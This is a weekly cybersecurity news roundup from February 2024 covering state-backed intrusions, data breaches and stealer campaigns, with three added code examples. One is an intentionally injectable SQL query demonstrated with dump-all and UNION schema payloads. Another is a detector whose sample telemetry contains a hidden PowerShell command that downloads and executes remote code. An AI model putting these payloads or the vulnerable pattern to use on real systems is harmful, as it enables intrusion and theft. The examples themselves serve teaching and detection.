Thursday, February 8th, 2024
Cybersecurity Week in Review (09/02/24)
Chinese Hackers Hid in US Infrastructure Network for 5 Years
The Chinese Volt Typhoon cyber-espionage group infiltrated a critical infrastructure network in the United States and remained undetected for at least five years before being discovered, according to a joint advisory from CISA, the NSA, the FBI, and partner Five Eyes agencies.
Volt Typhoon is known for relying heavily on living off the land (LOTL) techniques in its attacks on critical infrastructure organizations. The group also uses stolen accounts and maintains strong operational security, which lets it avoid detection and keep long-term persistence on compromised systems.
“In fact, the U.S. authoring agencies have recently observed indications of Volt Typhoon actors maintaining access and footholds within some victim IT environments for at least five years,” the agencies said.
“Volt Typhoon actors conduct extensive pre-exploitation reconnaissance to learn about the target organization and its environment; tailor their tactics, techniques, and procedures (TTPs) to the victim’s environment; and dedicate ongoing resources to maintaining persistence and understanding the target environment over time, even after initial compromise.”
The Chinese threat group has successfully breached the networks of multiple critical infrastructure organizations across the United States while mainly targeting the communications, energy, transportation, and water/wastewater sectors.
Its targets and tactics also diverge from typical cyber espionage activity, leading authorities to conclude with high confidence that the group aims to pre-position itself in networks that give it access to Operational Technology (OT) assets, with the end goal of disrupting critical infrastructure.
U.S. authorities are also concerned that Volt Typhoon could use this access to critical networks to cause disruptive effects, particularly during a military conflict or period of geopolitical tension.
“Volt Typhoon actors are seeking to pre-position themselves—using living off the land (LOTL) techniques—on IT networks for disruptive or destructive cyber activity against U.S. critical infrastructure in the event of a major crisis or conflict with the United States,” CISA warned.
“This is something we have been addressing for a long time,” said Rob Joyce, NSA’s Director of Cybersecurity and Deputy National Manager for National Security Systems (NSS).
“We have gotten better at all aspects of this, from understanding Volt Typhoon’s scope, to identifying the compromises likely to impact critical infrastructure systems, to hardening targets against these intrusions, to working together with partner agencies to combat PRC cyber actors.”
The advisory is accompanied by a technical guide on detecting Volt Typhoon techniques, determining whether they were used to compromise an organization’s network, and mitigations that harden environments against attackers using Living Off the Land techniques.
The Chinese threat group, also tracked as Bronze Silhouette, has been targeting and breaching U.S. critical infrastructure since at least mid-2021, according to a May 2023 report published by Microsoft.
Verizon Says Data Breach Impacted 63,000 Employees
Telecommunications giant Verizon Communications is notifying more than 63,000 employees that their personal information was exposed in an internal data breach. The company has informed the Maine Attorney General’s Office that the incident was discovered on December 12, 2023, but that it occurred on or around September 21, 2023.
“A Verizon employee obtained a file containing certain employee personal information without authorization and in violation of company policy,” the company’s notification letter to the impacted individuals reads.
Verizon’s investigation determined that the file contained names, addresses, dates of birth, Social Security numbers, other national identifiers, gender details, union affiliation, and compensation information.
Verizon says it has started improving its technical controls to prevent similar incidents and is also notifying applicable regulators.
“At this time, we have no evidence that this information has been misused or shared outside of Verizon as a result of this issue,” the company notes.
However, the impacted individuals are being offered free identity protection and credit monitoring services.
Verizon informed the Maine AGO that a total of 63,206 individuals were affected by the incident. All appear to be current employees, based on the company’s note that instructions for identity protection and credit monitoring services enrollment will be delivered to their work email addresses.
The data breach, a Verizon spokesman said, was the result of an employee inappropriately handling the file containing personal information, without ill intent.
“At this point, we have no reason to believe the information was improperly used or that it was shared outside of Verizon. There is no indication of malicious intent nor do we believe the information was shared externally,” Verizon’s spokesman said.
Source – https://www.securityweek.com/verizon-discloses-internal-data-breach-impacting-63000-employees/
Two Million Affected as Learning App Suffers Data Leak
A misconfigured database on the LectureNotes Learning App, a platform for sharing class notes, has exposed more than two million user records. In December 2023, researchers discovered a misconfigured MongoDB database belonging to LectureNotes. The database was being updated in real-time and exposed the personal and access data of users and app admins.
A total of 2,165,139 user records were exposed, with the leaked data including:
- Username
- First and last name
- Encrypted password
- Phone number
- IP address
- User-agent
- Session tokens
LectureNotes is a platform for students, teachers, and institutions to share class notes peer-to-peer, aiming to remove dictation from classrooms. According to Google Play, the app has been downloaded more than half a million times and has 12.9 thousand reviews, averaging 2.5 stars out of 5.
The exposure of session tokens is the most severe finding: a valid token can be replayed to take over a user’s session without ever entering the password. The exposed administrator authorization details, including IDs and secrets, raise the risk further by granting access to privileged accounts; an attacker holding them could take control of the platform’s functionality, deploy ransomware, or run phishing campaigns against its users.
Researchers attribute the leak to a misconfigured MongoDB database that was left public. This situation could have been prevented with proper authentication and access controls.
“The rule of thumb for MongoDB administrators is always to enable authentication and ensure that only authorized users can access the database. Using strong passwords and keyfile authentication improves security,” researchers suggest.
MongoDB does not enforce authentication out of the box, and administrators often overlook this: an instance started without `security.authorization: enabled`, bound to a public interface, and lacking TLS or network access controls is readable by anyone who can reach its port.
They also recommend implementing monitoring solutions to detect unusual activity or potential security incidents and setting up alerts for suspicious events for rapid response.
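The following is an added example, not code from the researchers or from the MongoDB project, that turns the recommendations above into an automated check. It audits a mongod configuration (represented here as the parsed YAML, so a dictionary) for the exposure pattern behind this leak: authorization not enabled, the listener bound to every interface, no TLS, and a replica set without keyfile authentication. The two configurations are constructed to show a weak mongod.conf beside a hardened one; the option names are MongoDB’s real YAML keys, but the paths and addresses in them are placeholders.

```python
"""Audit a mongod configuration for the misconfiguration pattern that
exposed the LectureNotes database (no auth, public listener, no TLS).

Added example, not code from the researchers or from MongoDB. The two
configurations are constructed; option names are MongoDB's real YAML keys
(security.authorization, net.bindIp, net.bindIpAll, net.tls.mode,
security.keyFile, replication.replSetName), paths and IPs are placeholders."""

from typing import Any

# Constructed: what an unauthenticated, publicly reachable instance looks like.
WEAK_CONFIG: dict[str, Any] = {
    "net": {"port": 27017, "bindIp": "0.0.0.0"},
    "storage": {"dbPath": "/var/lib/mongodb"},
}

# Constructed: the same deployment with the controls the researchers recommend.
HARDENED_CONFIG: dict[str, Any] = {
    "net": {
        "port": 27017,
        "bindIp": "127.0.0.1,10.0.5.12",          # loopback plus one internal NIC
        "tls": {"mode": "requireTLS", "certificateKeyFile": "/etc/ssl/mongod.pem"},
    },
    "security": {"authorization": "enabled", "keyFile": "/etc/mongod/keyfile"},
    "replication": {"replSetName": "rs0"},
    "storage": {"dbPath": "/var/lib/mongodb"},
}


def _get(cfg: dict, path: str, default: Any = None) -> Any:
    """Walk a dotted key path such as 'net.tls.mode' through nested dicts."""
    node: Any = cfg
    for part in path.split("."):
        if not isinstance(node, dict) or part not in node:
            return default
        node = node[part]
    return node


def audit_mongod_config(cfg: dict) -> list[str]:
    """Return a list of findings; an empty list means no issue was detected."""
    findings: list[str] = []

    # 1. Access control: mongod accepts unauthenticated clients unless this is set.
    if _get(cfg, "security.authorization") != "enabled":
        findings.append(
            "security.authorization is not 'enabled': anyone who can reach the "
            "port can read and write every database"
        )

    # 2. Network exposure: binding to all interfaces puts the listener on the internet.
    bind_ip = str(_get(cfg, "net.bindIp", "127.0.0.1"))
    bind_all = bool(_get(cfg, "net.bindIpAll", False))
    if bind_all or any(ip.strip() in ("0.0.0.0", "::") for ip in bind_ip.split(",")):
        findings.append("net.bindIp/net.bindIpAll exposes the listener on every interface")

    # 3. Transport security: without TLS, credentials and session tokens cross the wire in clear text.
    if _get(cfg, "net.tls.mode") != "requireTLS":
        findings.append("net.tls.mode is not 'requireTLS'")

    # 4. Replica-set members must authenticate to each other; a keyfile is the mechanism recommended above.
    if _get(cfg, "replication.replSetName") and not _get(cfg, "security.keyFile"):
        findings.append("replica set configured without security.keyFile for member authentication")

    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {audit_mongod_config(cfg) or ['no findings']}")
```

Feeding a real deployment through this check only needs `yaml.safe_load` of the live mongod.conf in place of the constructed dictionaries; the audit deliberately treats a missing `security` section the same as an explicit `authorization: disabled`, because that is how mongod treats it.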
MongoDB stores data in a flexible JSON-like format and is a popular NoSQL database choice. Misconfigured MongoDB databases have previously exposed a million users of the crypto exchange GokuMarket, customers of nine Russian crypto exchanges, 13 million users of the fortune-telling website WeMystic, clients of Dubai’s largest taxi app, and others.
Source – https://cybernews.com/security/lecturenotes-data-leak-two-million-affected/
China Hackers Penetrate Dutch Military Network via FortiGate
A Chinese state-sponsored espionage actor targeted the Dutch military through Fortinet FortiGate devices. The malware was found in 2023 on a standalone armed-forces computer, and the Military Intelligence and Security Service (MIVD) determined that a China state-sponsored actor was behind the attack.
The MIVD said the malware was built specifically for espionage. The attackers exploited a flaw in the FortiGate devices to connect remotely into the network.
The affected computer was used for unclassified research and development and was segregated from the wider network, so the intrusion caused no collateral damage.
“For the first time, the MIVD has chosen to make public a technical report on the working methods of Chinese hackers. It is important to attribute such espionage activities by China,” said Defense Minister Kajsa Ollongren. “In this way we increase international resilience against this type of cyber espionage.”
The malware was installed through a known vulnerability in FortiGate devices, CVE-2022-42475, a heap-based buffer overflow in the FortiOS SSL-VPN that Fortinet disclosed and classified as high impact in December 2022.
Experts specified that the malware, a remote access trojan (RAT), was aimed at maintaining access to the network rather than gaining it.
Source – https://cybernews.com/news/china-hackers-dutch-military-network/
Hackers Exploit Job Boards, Stealing Millions of Resumes and Personal Data
Employment agencies and retail companies chiefly located in the Asia-Pacific (APAC) region have been targeted by a previously undocumented threat actor known as ResumeLooters since early 2023 with the goal of stealing sensitive data.
The hacking crew’s activities are geared towards job search platforms and the theft of resumes, with as many as 65 websites compromised between November 2023 and December 2023. The stolen files are estimated to contain 2,188,444 user data records, of which 510,259 have been taken from job search websites. Over two million unique email addresses are present within the dataset.
Using SQL injection attacks against the websites, the threat actor attempts to steal user databases that may include names, phone numbers, email addresses and dates of birth, as well as job seekers’ experience, employment history, and other sensitive personal data.
Researchers also uncovered evidence of cross-site scripting (XSS) infections on at least four legitimate job search websites that are designed to load malicious scripts responsible for displaying phishing pages capable of harvesting administrator credentials.
ResumeLooters is the second hacking group after GambleForce that has been found staging SQL injection attacks in the APAC region since the latter’s public disclosure in late December 2023.
A majority of the compromised websites are based in India, Taiwan, Thailand, Vietnam, China, Australia, and Turkey, although compromises have also been reported from Brazil, the U.S., Russia, Mexico, and Italy.
The modus operandi of ResumeLooters involves the use of the open-source sqlmap tool to carry out SQL injection attacks and drop and execute additional payloads such as the BeEF (short for Browser Exploitation Framework) penetration testing tool and rogue JavaScript code designed to gather sensitive data and redirect users to credential harvesting pages.
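The injection that sqlmap automates is worth seeing in the small. The following is an added example, not code from the ResumeLooters investigation: a job-board candidate search written the injectable way beside the parameterized fix, run against an in-memory SQLite table with three constructed rows. The tautology payload mirrors what sqlmap sends when probing a boolean-based injection, and the UNION payload shows the schema enumeration step that precedes dumping a whole user table. Table and column names, rows, and payloads are all constructed.

```python
"""Why sqlmap works against a job board: the search query is built by string
concatenation, so an attacker-controlled search term rewrites the SQL.

Added example, not code from the ResumeLooters investigation. Table, rows
and payloads are constructed; SQLite stands in for the site's database."""

import sqlite3

# Constructed sample data standing in for a job-board candidate table.
_SEED_ROWS = [
    ("alice", "alice@example.org", "1990-04-02", "+91-9000000001"),
    ("bob", "bob@example.org", "1985-11-23", "+886-900000002"),
    ("carol", "carol@example.org", "1998-07-15", "+66-900000003"),
]


def make_db() -> sqlite3.Connection:
    """Fresh in-memory database with a single candidates table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE candidates(username TEXT, email TEXT, dob TEXT, phone TEXT)")
    conn.executemany("INSERT INTO candidates VALUES (?, ?, ?, ?)", _SEED_ROWS)
    return conn


def search_vulnerable(conn: sqlite3.Connection, username: str) -> list[tuple]:
    """The injectable version: user input is spliced into the SQL text."""
    sql = f"SELECT username, email, dob, phone FROM candidates WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, username: str) -> list[tuple]:
    """The fix: the value travels as a bound parameter, never as SQL text."""
    sql = "SELECT username, email, dob, phone FROM candidates WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Boolean tautology: turns "WHERE username = 'x'" into a condition that is always true.
DUMP_ALL_PAYLOAD = "nobody' OR '1'='1"

# UNION-based schema enumeration: reads table definitions out of sqlite_master.
# Four literals match the four selected columns; the trailing -- comments out
# the closing quote the application appends.
SCHEMA_PAYLOAD = "nobody' UNION SELECT name, sql, '', '' FROM sqlite_master--"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology:", search_vulnerable(db, DUMP_ALL_PAYLOAD))  # every row leaks
    print("vulnerable, schema:   ", search_vulnerable(db, SCHEMA_PAYLOAD))    # table DDL leaks
    print("safe, same payload:   ", search_safe(db, DUMP_ALL_PAYLOAD))        # no such username
```

The parameterized version returns nothing for either payload because the database engine receives the payload as a string value to compare, not as SQL to parse; that is the whole of the fix, and it is the reason sqlmap finds nothing to exploit on endpoints written this way.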
Analysis of the threat actor’s infrastructure reveals the presence of other tools like Metasploit, dirsearch, and xray, alongside a folder hosting the pilfered data.
The campaign appears to be financially motivated, given the fact that ResumeLooters have set up two Telegram channels named 渗透数据中心 and 万国数据阿力 as of last year to sell the information.
Source – https://thehackernews.com/2024/02/hackers-exploit-job-boards-in-apac.html
A Chicago Children’s Hospital Has Taken Its Networks Offline After a Cyberattack
A Chicago children’s hospital has been forced to take its networks offline after an unspecified cyberattack, limiting access to medical records and hampering communication by phone or email since the middle of last week.
The situation at Lurie Children’s Hospital had all the hallmarks of a ransomware attack, although hospital officials would not confirm or deny the cause Monday.
The hospital initially described the issue Wednesday as a network outage. On Thursday, officials released public statements saying the hospital had taken its networks offline as part of its response to a “cybersecurity matter.”
“We are taking this very seriously, investigating with the support of leading experts, and are working in collaboration with law enforcement agencies,” the hospital said in a statement Thursday. “As Illinois’ leading provider for pediatric care, our overarching priority is to continue providing safe, quality care to our patients and the communities we serve. Lurie Children’s is open and providing care to patients with as limited disruption as possible.”
Media representatives for the hospital did not return messages seeking more information, including whether the attack was caused by ransomware. Such extortion-style attacks are popular among those seeking financial gain by locking data, records or other critical information, and then demanding money to release it back to the owner.
A 2023 report by the Department of Health and Human Services warned of dramatic increases in digital attacks on health care and public health entities in recent years, causing delayed or disrupted care for patients across the country.
Health care providers aren’t alone; state courts, county or state governments and schools all have struggled to recover from cyber-based attacks.
The latest annual report for Lurie Children’s said staff treated around 260,000 patients last year. Chicago-area pediatrician practices that work with the hospital also have reported being unable to access digital medical records because of the attack.
On Friday, the hospital announced a separate call center for patients to get prescriptions refilled or ask non-urgent questions about care or appointments.
Data Breach at French Healthcare Services Firm Puts Millions at Risk
French healthcare services firm Viamedis suffered a cyberattack that exposed the data of policyholders and healthcare professionals in the country. Though the company’s website remains offline at the time of writing, an announcement was posted on LinkedIn warning of the data breach.
The data exposed in the attack includes a beneficiary’s marital status, date of birth, social security number, name of health insurer, and guarantees open to third-party payment. The company has clarified that the breached systems did not store people’s banking information, postal details, telephone numbers, and email addresses.
For healthcare professionals, Viamedis says it will send separate notifications describing which data was exposed. Viamedis has informed the impacted health organizations, filed a complaint with the public prosecutor, and notified the authorities (CNIL, ANSSI). The company is still investigating the impact of the cyberattack.
Regarding the scale of the breach, Viamedis has not stated the number of exposed individuals, but it is known that it manages payments for 84 healthcare organizations covering 20 million insured individuals.
The firm’s General Director, Christophe Cande, told Agence France-Presse (AFP) that an investigation is underway to determine the scope of the breach.
“To date, we do not have the number of insured individuals impacted; we are still in the process of investigation.” – Cande (GD Viamedis)
Cande has also clarified that the cyberattack wasn’t ransomware. Instead, he said a successful phishing attack on an employee allowed the threat actor to breach its systems.
One of the organizations working with Viamedis, Malakoff Humanis, has posted a notice on its website confirming the indirect impact of the Viamedis data breach. The company is also sending data breach notifications to impacted customers to inform them of the cyberattack and disruption of services.
Their message reiterates the information disclosed in the Viamedis notice and assures clients that no banking, medical, or contact details stored on the platforms have been compromised.
Malakoff Humanis says access to user accounts and reimbursement claims remains available. However, the temporary disconnection of the Viamedis platform is expected to affect the provision of certain healthcare services.
Other service providers using Viamedis, including Carte Blanche Partenaires, Itelis, Kalixia, Santéclair, and Audiens, are expected to experience similar situations.
Local media in France reported that Viamedis wasn’t the only target of the cyberattack. Reportedly, a company named “Almerys,” which is also a payment processor for healthcare organizations, was also targeted.
Fake Facebook Job Ads Spreading ‘Ov3r_Stealer’ to Steal Crypto and Credentials
Threat actors are leveraging bogus Facebook job advertisements as a lure to trick prospective targets into installing a new Windows-based stealer malware codenamed Ov3r_Stealer. This malware is designed to steal credentials and crypto wallets and send those to a Telegram channel that the threat actor monitors.
Ov3r_Stealer is capable of siphoning IP address-based location, hardware info, passwords, cookies, credit card information, auto-fills, browser extensions, crypto wallets, Microsoft Office documents, and a list of antivirus products installed on the compromised host.
While the exact end goal of the campaign is unknown, it’s likely that the stolen information is offered for sale to other threat actors. Another possibility is that Ov3r_Stealer could be updated over time to act as a QakBot-like loader for additional payloads, including ransomware.
The starting point of the attack is a weaponized PDF file that purports to be a file hosted on OneDrive, urging users to click on an “Access Document” button embedded into it.
Researchers identified the PDF file being shared on a fake Facebook account impersonating Amazon CEO Andy Jassy as well as via Facebook ads for digital advertising jobs.
Users who end up clicking on the button are served an internet shortcut (.URL) file that masquerades as a DocuSign document hosted on Discord’s content delivery network (CDN). The shortcut file then acts as a conduit to deliver a control panel item (.CPL) file, which is then executed using the Windows Control Panel process binary (“control.exe”).
The execution of the CPL file leads to the retrieval of a PowerShell loader (“DATA1.txt”) from a GitHub repository to ultimately launch Ov3r_Stealer.
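The chain above (a .URL shortcut delivering a .CPL that control.exe runs, which in turn launches a PowerShell download cradle) leaves a distinctive parent-child pattern in process-creation telemetry. The following is an added example, not the researchers’ detection content, that flags that pattern over a handful of constructed events in a simplified Sysmon-style shape (image, parent image, command line). The field layout is an assumption about the collector, the paths and the repository URL are placeholders rather than indicators from the campaign, and the example also matches rundll32.exe as the parent because control.exe commonly hands a .cpl to rundll32 via shell32’s Control_RunDLL.

```python
"""Detect the control.exe -> .cpl -> PowerShell download chain in
process-creation telemetry.

Added example, not the researchers' detection content. Events are
constructed in a simplified Sysmon-style shape; field names are an
assumption about the collector, and every path and URL is a placeholder."""

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str    # basename of the executing binary
    parent: str   # basename of the parent process
    cmdline: str  # full command line


# A .cpl living under Downloads, AppData or Temp is user-delivered, not a Control Panel applet.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|appdata)\\|\\temp\\", re.I)
CPL_ARG = re.compile(r"\.cpl\b", re.I)
# Common PowerShell cradles used to fetch a second stage such as the DATA1.txt loader.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|invoke-expression|\biex\b",
    re.I,
)
CPL_HOSTS = ("control.exe", "rundll32.exe")


def detect(events: list[ProcEvent]) -> list[str]:
    """Return one alert string per event that matches a stage of the chain."""
    alerts: list[str] = []
    for ev in events:
        image, parent = ev.image.lower(), ev.parent.lower()
        # Stage 2: a Control Panel host loading a .cpl from a user-writable location.
        if image in CPL_HOSTS and CPL_ARG.search(ev.cmdline) and USER_WRITABLE.search(ev.cmdline):
            alerts.append(f"{image} loading a user-delivered .cpl: {ev.cmdline}")
        # Stage 3: PowerShell spawned by the Control Panel host and reaching out for more code.
        if image in ("powershell.exe", "pwsh.exe") and parent in CPL_HOSTS and DOWNLOAD_CRADLE.search(ev.cmdline):
            alerts.append(f"{image} download cradle under {parent}: {ev.cmdline}")
    return alerts


# Constructed sample telemetry: one malicious chain plus two benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "userinit.exe", r"C:\Windows\explorer.exe"),
    ProcEvent("control.exe", "explorer.exe",
              r'C:\Windows\System32\control.exe "C:\Users\jdoe\Downloads\Document.cpl"'),
    ProcEvent("rundll32.exe", "control.exe",
              r'rundll32.exe shell32.dll,Control_RunDLL "C:\Users\jdoe\Downloads\Document.cpl"'),
    ProcEvent("powershell.exe", "rundll32.exe",
              "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString("
              "'https://raw.githubusercontent.com/example-org/example-repo/main/DATA1.txt')\""),
    # Benign: an administrator opening a built-in applet by canonical name.
    ProcEvent("control.exe", "explorer.exe",
              r"C:\Windows\System32\control.exe /name Microsoft.NetworkAndSharingCenter"),
    # Benign: interactive PowerShell under the shell, no cradle.
    ProcEvent("powershell.exe", "explorer.exe", "powershell.exe -NoProfile Get-ChildItem"),
]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The two rules fire independently, so a variant that skips the download cradle (for example, a .cpl that embeds the stealer directly) is still caught by the first rule; conversely, PowerShell under control.exe or rundll32.exe with a cradle is suspicious even when the .cpl path is not visible in the parent’s command line.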
It’s worth noting that a near-identical infection chain was recently disclosed by Trend Micro as having been used by threat actors to drop another stealer, Phemedrone Stealer, by exploiting the Microsoft Windows Defender SmartScreen bypass flaw (CVE-2023-36025, CVSS score: 8.8).
The similarities extend to the GitHub repository used (nateeintanan2527) and the fact that Ov3r_Stealer shares code-level overlaps with Phemedrone.
Further solidifying the connections between the two stealer malware, the threat actor has been observed sharing news reports published about the Phemedrone Stealer on their Telegram channels in an effort to build “street cred” for their malware-as-a-service (MaaS) business.
The findings come as it was revealed that threat actors are advertising their access to law enforcement request portals of major organizations like Binance, Google, Meta, and TikTok by exploiting credentials obtained from infostealer infections.
Source – https://thehackernews.com/2024/02/beware-fake-facebook-job-ads-spreading.html
U.S. Sanctions 6 Iranian Officials for Critical Infrastructure Cyber Attacks
The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) announced sanctions against six officials associated with the Iranian intelligence agency for attacking critical infrastructure entities in the U.S. and other countries.
The officials include Hamid Reza Lashgarian, Mahdi Lashgarian, Hamid Homayunfal, Milad Mansuri, Mohammad Bagher Shirinkar, and Reza Mohammad Amin Saberian, who are part of the Iranian Islamic Revolutionary Guard Corps Cyber-Electronic Command (IRGC-CEC).
Hamid Reza Lashgarian is also the head of the IRGC-CEC and a commander in the IRGC-Qods Force. He is alleged to have been involved in various IRGC cyber and intelligence operations.
The Treasury Department said it’s holding these individuals responsible for carrying out “cyber operations in which they hacked and posted images on the screens of programmable logic controllers manufactured by Unitronics, an Israeli company.”
In late November 2023, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that the Municipal Water Authority of Aliquippa in western Pennsylvania had been targeted by Iranian threat actors who compromised its Unitronics PLCs.
The attack was attributed to an Iranian hacktivist persona dubbed Cyber Av3ngers, which came to the forefront in the aftermath of the Israel-Hamas conflict, staging destructive attacks against entities in Israel and the U.S.
The group, which has been active since 2020, is also said to be behind several other cyber attacks, including one targeting Boston Children’s Hospital in 2021 and others in Europe and Israel.
“Industrial control devices, such as programmable logic controllers, used in water and other critical infrastructure systems, are sensitive targets,” the Treasury Department noted.
“Although this particular operation did not disrupt any critical services, unauthorized access to critical infrastructure systems can enable actions that harm the public and cause devastating humanitarian consequences.”
The development comes as another pro-Iranian “psychological operation group” known as Homeland Justice said it attacked Albania’s Institute of Statistics (INSTAT) and claimed to have stolen terabytes of data.
Homeland Justice has a track record of targeting Albania since mid-July 2022, with the threat actor most recently observed delivering a wiper malware codenamed No-Justice.
Source – https://thehackernews.com/2024/02/us-sanctions-6-iranian-officials-for.html
Clorox says Cyberattack Caused $49 Million in Expenses
Clorox has confirmed that the August 2023 cyberattack has so far cost the company $49 million in expenses related to its response to the incident. Clorox is an American manufacturer of consumer and professional cleaning products with 8,700 employees and almost $7.5 billion in revenue for 2023.
On August 11th, Clorox suffered a cyberattack that caused significant disruption in the company’s operation, leading to lowered production and decreased availability of consumer products. In an earnings report filed with the SEC on Thursday, Clorox disclosed it incurred $49 million in expenses related to the cyberattack by the end of 2023.
“The costs incurred relate primarily to third-party consulting services, including IT recovery and forensic experts and other professional services incurred to investigate and remediate the attack, as well as incremental operating costs incurred from the resulting disruption to the Company’s business operations,” reads the Clorox 2024 Q2 Quarterly report.
The company has acknowledged that they are still working to recover from the attack but expects to incur lessening costs related to the cyberattack in the future.
“Our second quarter results reflect strong execution on our recovery plan from the August cyberattack,” said Clorox Chair and CEO Linda Rendle in an 8-K filing.
“We are rebuilding retailer inventories ahead of schedule, enabling us to return to merchandising and restore distribution. While there is still more work to do, we’re focused on executing with excellence in what remains a challenging environment to drive top-line growth and rebuild margin.”
Johnson Controls International also confirmed this week that a September 2023 ransomware attack cost the company $27 million in expenses, leading to a data breach after hackers stole corporate data.
While Clorox has not provided many details about their attack, Bloomberg reported that it is believed to have been conducted by the hacker collective known as Scattered Spider.
Scattered Spider is a loose-knit group of threat actors, many of them English-speaking, who specialize in social engineering to breach corporate networks. What makes Scattered Spider unusual is that its members also operate as affiliates of the BlackCat/ALPHV ransomware gang, which usually works only with Russian-speaking threat actors. Scattered Spider has previously been linked to attacks on MGM, Caesars, DoorDash, and Reddit.